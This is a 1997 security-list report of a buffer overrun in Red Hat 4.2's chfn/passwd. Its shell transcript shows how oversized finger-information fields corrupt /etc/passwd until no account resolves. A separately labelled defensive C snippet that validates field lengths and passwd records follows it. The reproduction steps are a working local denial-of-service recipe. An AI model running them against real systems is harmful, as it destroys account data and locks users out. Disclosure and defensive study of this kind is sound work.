Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)

Alex Mottram (alex@NET-CONNECT.NET)
Fri, 19 Dec 1997 07:37:49 -0600

I don't have the time to look into this much further, but it definitely
looks scary. I've tried it on 3 machines, and they all produce the
same results. For what it's worth, all 3 machines were installed from
the Redhat PowerTools 4.2 CD and have applied all relevant patches
from ftp.redhat.com/pub/updates/4.2/i386/.

Configuration Information
---------------------------------------------
[alex@machine alex]$ cat /etc/redhat-release
release 4.2 (Biltmore)

rpm -qf /usr/bin/chfn
util-linux-2.5-38

rpm -qf /usr/bin/passwd
passwd-0.50-7

rpm -q pam
pam-0.57-4

[alex@machine alex]$ cat /etc/pam.conf
#
# THIS FILE IS NOW OBSOLETE
#
# The contents of this file should be replaced by files in the
# /etc/pam.d/ directory.
#
#

[alex@machine alex]$ ls /etc/pam.d/
chfn ftp login passwd rlogin samba xdm
chsh imap other rexec rsh su

[alex@machine alex]$ cat /etc/pam.d/chfn
#%PAM-1.0
auth required /lib/security/pam_pwdb.so shadow nullok
account required /lib/security/pam_pwdb.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_pwdb.so shadow nullok use_authtok
session required /lib/security/pam_pwdb.so

[alex@machine alex]$ cat /etc/pam.d/passwd
#%PAM-1.0
auth required /lib/security/pam_pwdb.so shadow nullok
account required /lib/security/pam_pwdb.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_pwdb.so use_authtok nullok

[alex@machine /tmp]$ tail /etc/passwd
alex:x:500:500:alex,,,,:/home/alex:/bin/bash
zane:x:501:501:zane,,,,:/home/zane:/bin/bash
someone:x:502:502::/home/someone:/bin/bash

[alex@machine /tmp]$ cat pass
#this test has 11719 bytes of the sequence "0123456789", Xs work just as well.
export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]'
/bin/bash

[alex@machine /tmp]$ ./pass
[alex@machine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
Changing finger information for alex.
Password:
Finger information changed.
[alex@machine /tmp]$ wc /etc/passwd
26 29 2068 /etc/passwd

** At this point, the passwd entry for 'alex' is >48k long **

[alex@machine alex]$ passwd
Changing password for alex
(current) UNIX password:
New UNIX password:
Segmentation fault

** LOGIN AS SECOND USER **
[zane@machine zane]$ passwd
Changing password for zane
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully

** 'passwd' just snipped our one big line into nice 8k chunks
** and created some junk passwd file entries.

[zane@machine zane]$ wc /etc/passwd
31 34 47829 /etc/passwd

[zane@machine zane]$ su someuser
su: user someuser does not exist
[zane@machine zane]$ su alex
su: user alex does not exist
[zane@machine zane]$ su zane
su: user zane does not exist

Other services I checked were equally screwed. (ftp, pop-3, etc...)
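
The two checks the transcript above shows were missing, written as an added example (not part of the original post and not code from chfn, passwd or PAM): a bound on finger-information fields before they are stored, and an audit that flags passwd records that are over-long or no longer have seven fields. The limits `MAX_GECOS` and `MAX_LINE`, the rejected byte set and the function names are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

#define MAX_GECOS 256   /* assumed per-field limit, not from the post */
#define MAX_LINE  1024  /* assumed per-entry limit, not from the post */

/* Return 1 if a finger-information field is safe to store: bounded length
 * and none of the bytes that delimit passwd fields or records. */
int gecos_field_ok(const char *s)
{
    if (strlen(s) > MAX_GECOS)
        return 0;
    return strpbrk(s, ":,\r\n") == NULL;
}

/* Count records in a passwd-format buffer that are over-long or do not
 * have exactly 7 colon-separated fields. Scans byte by byte, so a long
 * record is judged whole instead of being cut by a fixed-size read. */
int count_bad_entries(const char *buf, size_t n)
{
    size_t i, len = 0, colons = 0;
    int bad = 0;

    for (i = 0; i < n; i++) {
        if (buf[i] == '\n') {
            if (len > MAX_LINE || colons != 6)
                bad++;
            len = colons = 0;
        } else {
            len++;
            if (buf[i] == ':')
                colons++;
        }
    }
    if (len > 0 && (len > MAX_LINE || colons != 6))
        bad++;              /* unterminated last record */
    return bad;
}

int main(void)
{
    /* Constructed sample: one valid entry, then a fragment with no fields. */
    const char *sample =
        "zane:x:501:501:zane,,,,:/home/zane:/bin/bash\n"
        "0123456789012345678901234567890123456789\n";

    printf("field accepted: %d\n", gecos_field_ok("Alex Mottram"));
    printf("bad entries: %d\n", count_bad_entries(sample, strlen(sample)));
    return 0;
}
```

Blank lines are counted as malformed records, since they also have the wrong field count.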